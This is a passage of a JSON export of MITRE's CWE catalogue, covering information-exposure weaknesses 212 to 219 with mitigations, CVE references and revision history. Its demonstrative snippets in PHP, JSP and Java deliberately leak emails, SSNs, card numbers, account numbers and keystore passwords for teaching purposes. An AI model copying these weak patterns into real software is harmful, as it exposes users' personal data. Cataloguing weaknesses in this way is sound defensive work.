Reduction","Description":"Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This makes it easier to spot places in the code where data is being used that is unencrypted."},{"Phase":"Implementation","Description":"Avoid errors related to improper resource shutdown or release (CWE-404), which may leave the sensitive data within the resource if it is in an incomplete state."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code either generates a public HTML user information page or a JSON response containing the same user information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$json = $_GET[\'json\']$username = $_GET[\'user\']if(!$json){}else{}","xhtml:br":["","","","","","",""],"xhtml:i":"// API flag, output JSON if set","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$record = getUserRecord($username);foreach($record as $fieldName =&gt; $fieldValue){}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if($fieldName == \\"email_address\\") {}else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"continue;","xhtml:br":["",""],"xhtml:i":"// skip displaying user emails"}},{"#text":"writeToHtmlPage($fieldName,$fieldValue);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}},{"#text":"$record = getUserRecord($username);echo json_encode($record);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},"Body_Text":"The programmer is careful to not display the user\'s e-mail address when displaying the public HTML page. However, the e-mail address is not removed from the JSON response, exposing the user\'s e-mail address."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0406","Description":"Some image editors modify a JPEG image, but the original EXIF thumbnail image is left intact within the JPEG. (Also an interaction error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0406"},{"Reference":"CVE-2002-0704","Description":"NAT feature in firewall leaks internal IP addresses in ICMP error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0704"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Cross-Boundary Cleansing Infoleak"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"168"}}},"Notes":{"Note":[{"#text":"This entry is intended to be different from resultant information leaks, including those that occur from improper buffer initialization and reuse, improper encryption, interaction errors, and multiple interpretation errors. This entry could be regarded as a privacy leak, depending on the type of information that is leaked.","attr":{"@_Type":"Relationship"}},{"#text":"There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000).","attr":{"@_Type":"Relationship"}},{"#text":"The terms \\"cleansing\\" and \\"scrubbing\\" have multiple uses within computing. In information security, these are used for the removal of sensitive data, but they are also used for the modification of incoming/outgoing data so that it conforms to specifications.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Cross-boundary Cleansing Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Improper Cross-boundary Cleansing","attr":{"@_Date":"2010-02-16"}},{"#text":"Improper Cross-boundary Removal of Sensitive Data","attr":{"@_Date":"2020-02-24"}}]}},"213":{"attr":{"@_ID":"213","@_Name":"Exposure of Sensitive Information Due to Incompatible Policies","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product\'s intended functionality exposes information to certain actors in accordance with the developer\'s security policy, but this information is regarded as sensitive according to the intended security policies of other stakeholders such as the product\'s administrator, users, or others whose information is being processed.","Extended_Description":{"xhtml:p":"When handling information, the developer must consider whether the information is regarded as sensitive by different stakeholders, such as users or administrators.  Each stakeholder effectively has its own intended security policy that the product is expected to uphold.  When a developer does not treat that information as sensitive, this can introduce a vulnerability that violates the expectations of the product\'s users."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Policy","Note":"This can occur when the product\'s policy does not account for all relevant stakeholders, or when the policies of other stakeholders are not interpreted properly."},{"Phase":"Requirements","Note":"This can occur when requirements do not explicitly account for all relevant stakeholders."},{"Phase":"Architecture and Design","Note":"Communications or data exchange frameworks may be chosen that exchange or provide access to more information than strictly needed."},{"Phase":"Implementation","Note":"This can occur when the developer does not properly track the flow of sensitive information and how it is exposed, e.g., via an API."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-130"},"Intro_Text":"This code displays some information on a web page.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":"Social Security Number: &lt;%= ssn %&gt;&lt;/br&gt;Credit Card Number: &lt;%= ccn %&gt;"},"Body_Text":"The code displays a user\'s credit card and social security numbers, even though they aren\'t absolutely necessary."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1725","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1725"},{"Reference":"CVE-2004-0033","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0033"},{"Reference":"CVE-2003-1181","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1181"},{"Reference":"CVE-2004-1422","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1422"},{"Reference":"CVE-2004-1590","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1590"},{"Reference":"CVE-2003-1038","Description":"Product lists DLLs and full pathnames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1038"},{"Reference":"CVE-2005-1205","Description":"Telnet protocol allows servers to obtain sensitive environment information from clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1205"},{"Reference":"CVE-2005-0488","Description":"Telnet protocol allows servers to obtain sensitive environment information from clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0488"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Intended information leak"}},"Notes":{"Note":[{"#text":"This entry is being considered for deprecation.  It overlaps many other entries related to information exposures.  It might not be essential to preserve this entry, since other key stakeholder policies are covered elsewhere, e.g. personal privacy leaks (CWE-359) and system-level exposures that are important to system administrators (CWE-497).","attr":{"@_Type":"Maintenance"}},{"#text":"In vulnerability theory terms, this covers cases in which the developer\'s Intended Policy allows the information to be made available, but the information might be in violation of a Universal Policy in which the product\'s administrator should have control over which information is considered sensitive and therefore should not be exposed.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationship_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Name, Other_Notes, Relationship_Notes, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Intended Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Intentional Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"214":{"attr":{"@_ID":"214","@_Name":"Invocation of Process Using Visible Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A process is invoked with sensitive command-line arguments, environment variables, or other elements that can be seen by other processes on the operating system.","Extended_Description":"Many operating systems allow a user to list information about processes that are owned by other users. Other users could see information such as command line arguments or environment variable settings. When this data contains sensitive information such as credentials, it might allow other users to launch an attack against the software or related resources.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"497","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the example below, the password for a keystore file is read from a system property.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String keystorePass = System.getProperty(\\"javax.net.ssl.keyStorePassword\\");if (keystorePass == null) {}...","xhtml:br":["","",""],"xhtml:div":{"#text":"System.err.println(\\"ERROR: Keystore password not specified.\\");System.exit(-1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"If the property is defined on the command line when the program is invoked (using the -D... syntax), the password may be displayed in the OS process list."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1387","Description":"password passed on command line","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1387"},{"Reference":"CVE-2005-2291","Description":"password passed on command line","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2291"},{"Reference":"CVE-2001-1565","Description":"username/password on command line allows local users to view via \\"ps\\" or other process listing programs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1565"},{"Reference":"CVE-2004-1948","Description":"Username/password on command line allows local users to view via \\"ps\\" or other process listing programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1948"},{"Reference":"CVE-1999-1270","Description":"PGP passphrase provided as command line argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1270"},{"Reference":"CVE-2004-1058","Description":"Kernel race condition allows reading of environment variables of a process that is still spawning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1058"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Process information infoleak to other processes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"Under-studied, especially environment variables.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Process Information Leak to Other Processes","attr":{"@_Date":"2008-04-11"}},{"#text":"Process Environment Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Process Environment","attr":{"@_Date":"2020-02-24"}}]}},"215":{"attr":{"@_ID":"215","@_Name":"Insertion of Sensitive Information Into Debugging Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production.","Extended_Description":"When debugging, it may be necessary to report detailed information to the programmer.  However, if the debugging code is not disabled when the application is operating in a production environment, then this sensitive information may be exposed to attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Do not leave debug statements that could be executed in the source code. Ensure that all debug information is eradicated before releasing the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-131"},"Intro_Text":"The following program changes its behavior based on a debug flag.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;% if (Boolean.getBoolean(\\"debugEnabled\\")) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"%&gt;User account number: &lt;%= acctNo %&gt;&lt;%} %&gt;","xhtml:br":["","","",""]}}}},"Body_Text":"The code writes sensitive debug information to the client browser if the \\"debugEnabled\\" flag is set to true ."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2268","Description":"Password exposed in debug information.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2268"},{"Reference":"CVE-2002-0918","Description":"CGI script includes sensitive information in debug messages when an error is triggered.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0918"},{"Reference":"CVE-2003-1078","Description":"FTP client with debug option enabled shows password to the screen.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1078"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Infoleak Using Debug Information"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"This overlaps other categories.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Debug Information","attr":{"@_Date":"2010-09-27"}},{"#text":"Information Exposure Through Debug Information","attr":{"@_Date":"2020-02-24"}}]}},"216":{"attr":{"@_ID":"216","@_Name":"DEPRECATED: Containment Errors (Container Errors)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated, as it was not effective as a weakness and was structured more like a category. In addition, the name is inappropriate, since the \\"container\\" term is widely understood by developers in different ways than originally intended by PLOVER, the original source for this entry.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":{"#text":"Containment Errors (Container Errors)","attr":{"@_Date":"2020-02-24"}}}},"217":{"attr":{"@_ID":"217","@_Name":"DEPRECATED: Failure to Protect Stored Data from Modification","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it incorporated and confused multiple weaknesses. The issues formerly covered in this entry can be found at CWE-766 and CWE-767.","Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-20","Modification_Comment":"deprecated this entry in favor of new entries which focus on the multiple weaknesses formerly described here, CWE-766 and CWE-767"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Failure to Protect Stored Data from Modification","attr":{"@_Date":"2009-05-27"}}}},"218":{"attr":{"@_ID":"218","@_Name":"DEPRECATED: Failure to provide confidentiality for stored data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because it was a duplicate of CWE-493. All content has been transferred to CWE-493.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Failure to Provide Confidentiality for Stored Data","attr":{"@_Date":"2008-09-09"}},{"#text":"DEPRECATED (Duplicate): Failure to provide confidentiality for stored data","attr":{"@_Date":"2021-07-20"}}]}},"219":{"attr":{"@_ID":"219","@_Name":"Storage of File with Sensitive Data Under Web Root","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive data under the web document root with insufficient access control, which might make it accessible to untrusted parties.","Extended_Description":"Besides public-facing web pages and code, applications may store sensitive data, code that is not directly invoked, or other files under the web document root of the web server.  If the server is not configured or otherwise used to prevent direct access to those files, then attackers may obtain this sensitive data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","System Configuration"],"Description":"Avoid storing information under the web root directory."},{"Phase":"System Configuration","Description":"Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the web directory."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1835","Description":"Data file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1835"},{"Reference":"CVE-2005-2217","Description":"Data file under web 